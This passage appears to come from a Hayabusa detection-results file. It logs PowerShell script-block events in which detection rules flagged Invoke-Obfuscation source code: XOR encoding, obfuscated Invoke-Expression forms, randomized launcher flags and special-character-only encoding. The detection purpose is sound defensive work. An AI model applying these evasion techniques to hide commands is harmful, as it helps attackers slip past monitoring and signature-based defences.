If/Else block. $Split = ([Char[]]$Split | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit = ([Char[]]$RandomDelimitersToPrintForDashSplit | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Perform BXOR operation on $ScriptString. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([String]([Int][Char]$_ -BXOR $BXORValue)) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))} # Remove trailing comma from $EncodedArray. 
$EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generator BXOR syntax with randomly-chosen quotes. 
$Quotes = Get-Random -Input @('""',""'"",' ') $BXORSyntax = $BXOR + ' '*(Get-Random -Input @(0,1)) + $Quotes + $BXORValue + $Quotes $BXORConversion = '{' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + $BXORSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '}' # Generate the code that will decrypt and execute the payload and randomly select one. $BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + $BXORConversion + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. 
$InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. 
$PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $Comm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"andlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = 
$PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). 
#$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.276 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.279 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedSpecialCharOnlyCommand { <# .SYNOPSIS Generates Special-Character-Only encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. 
All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 Invoke-Obfuscation Function: Out-EncodedSpecialCharOnlyCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedSpecialCharOnlyCommand encodes an input PowerShell scriptblock or path as a Special-Character-Only payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProf -NonIn ""${ }= + $() ; ${ }=${ };${ } = ++ ${ }; ${ }=++${ } ;${ }=++${ };${ } =++ ${ } ; ${ } = ++${ };${ } =++ ${ } ; ${ }= ++${ } ;${ } = ++ ${ } ; ${ }=++ ${ } ;${ }=\""[\""+ \""$( @{ } ) \""[ ${ }]+\""$(@{ })\""[\""${ }${ }\""]+ \""$( @{ } ) \""[\""${ }${ }\""]+ \""$?\""[${ } ] + \""]\"" ;${ } = \""\"".(\""$( @{ } ) \""[\""${ }${ }\"" ] + \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[${ }] +\""$( @{ } ) \""[${ } ]+ \""$?\""[${ } ] +\""$( @{ } ) \""[${ }] ) ; ${ }= \""$( @{ } ) \""[ \""${ }${ }\""]+ \""$( @{ } ) \""[ ${ }] +\""${ }\""[ \""${ }${ }\""] ; & ${ }( \"" ${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }+ ${ }${ }${ } +${ }${ }${ }+${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ } + ${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }+${ }${ }${ }${ }+${ }${ }${ }${ }+ ${ }${ }${ } + ${ }${ }${ } +${ }${ }${ }+ ${ 
}${ }${ }+${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } + ${ }${ }${ }${ }+ ${ }${ }${ }${ } +${ }${ }${ }${ } +${ }${ }${ }+ ${ }${ }${ }+${ }${ }${ }${ } +${ }${ }${ }${ } + ${ }${ }${ }${ }+${ }${ }${ }${ }^|${ } \"" )"" C:\PS> Out-EncodedSpecialCharOnlyCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ${%``*} = +$() ; ${(\$}=${%``*} ; ${ *}=++ ${%``*};${$)(} = ++${%``*};${ } =++${%``*};${,+]}= ++ ${%``*} ; ${,} =++ ${%``*}; ${!``@} =++${%``*} ;${.} = ++ ${%``*}; ${]\}=++ ${%``*} ;${+}=++${%``*} ;${,-\}=""[""+""$(@{})""[${.}]+ ""$(@{})""[""${ *}${+}"" ]+""$(@{})""[""${$)(}${(\$}"" ] +""$?""[ ${ *}]+ ""]"";${%``*} = """".(""$(@{})""[ ""${ *}${,+]}"" ] +""$(@{})""[""${ *}${!``@}"" ]+ ""$(@{})""[${(\$} ] + ""$(@{})""[ ${,+]}]+ ""$?""[ ${ *}]+""$(@{})""[${ } ] ) ; ${%``*} = ""$(@{})""[""${ *}${,+]}""]+ ""$(@{})""[${,+]}]+ ""${%``*}""[""${$)(}${.}""] ;"" ${%``*} (${,-\}${]\}${.}+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@}+${,-\}${ *}${(\$}${ *} + ${,-\}${,+]}${,}+ ${,-\}${.}${$)(} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,}+${,-\}${ *}${ *}${!``@}+ ${,-\}${ }${$)(}+${,-\}${ }${+} +${,-\}${.}${$)(}+${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${]\} +${,-\}${ *}${ *}${ *}+${,-\}${ }${$)(}+ ${,-\}${]\}${.}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]} +${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${(\$}${(\$}+ ${,-\}${ }${ } +${,-\}${ }${+} + ${,-\}${ }${$)(}+ ${,-\}${,+]}${,} +${,-\}${.}${(\$} + ${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *}+${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.}+${,-\}${ *}${ *}${(\$}+ ${,-\}${ *}${(\$}${(\$} +${,-\}${!``@}${.} +${,-\}${ *}${ *}${ *} + ${,-\}${ 
*}${(\$}${]\} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${,+]}+${,-\}${ }${$)(} +${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${ *} + ${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} + ${,-\}${,}${+}+ ${,-\}${ }${$)(} +${,-\}${]\}${.} + ${,-\}${ *}${ *}${,+]}+ ${,-\}${ *}${(\$}${,}+ ${,-\}${ *}${ *}${!``@} +${,-\}${ *}${(\$}${ *}+${,-\}${,+]}${,}+${,-\}${.}${$)(}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,}+ ${,-\}${ *}${ *}${!``@} + ${,-\}${ }${$)(} +${,-\}${ }${+}+ ${,-\}${.}${+}+ ${,-\}${+}${]\} +${,-\}${ *}${(\$}${$)(} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${,} +${,-\}${+}${+}+${,-\}${+}${.} +${,-\}${ *}${ *}${!``@}+ ${,-\}${ *}${(\$}${,} +${,-\}${ *}${ *}${ *}+ ${,-\}${ *}${ *}${(\$}+${,-\}${ }${$)(}+ ${,-\}${]\}${$)(} +${,-\}${ *}${ *}${ *} +${,-\}${+}${+}+${,-\}${ *}${(\$}${.} +${,-\}${ *}${ *}${,}+ ${,-\}${ }${ } +${,-\}${ }${+}+ ${,-\}${ }${$)(} + ${,-\}${,+]}${,} + ${,-\}${.}${(\$}+${,-\}${ *}${ *}${ *}+${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ }+${,-\}${ *}${ *}${,+]} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${.} + ${,-\}${ *}${ *}${(\$}+${,-\}${ *}${(\$}${(\$}+${,-\}${!``@}${.}+ ${,-\}${ *}${ *}${ *}+${,-\}${ *}${(\$}${]\} + ${,-\}${ *}${ *}${ *} +${,-\}${ *}${ *}${,+]} +${,-\}${ }${$)(}+ ${,-\}${.}${ *} + ${,-\}${ *}${ *}${,+]}+${,-\}${ *}${(\$}${ *} +${,-\}${ *}${(\$}${ *}+ ${,-\}${ *}${ *}${(\$} )""| .${%``*} .NOTES All credit for this encoding technique goes to 牟田口大介 (@mutaguchi) who blogged about it in 2010: http://perl-users.jp/articles/advent-calendar/2010/sym/11 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
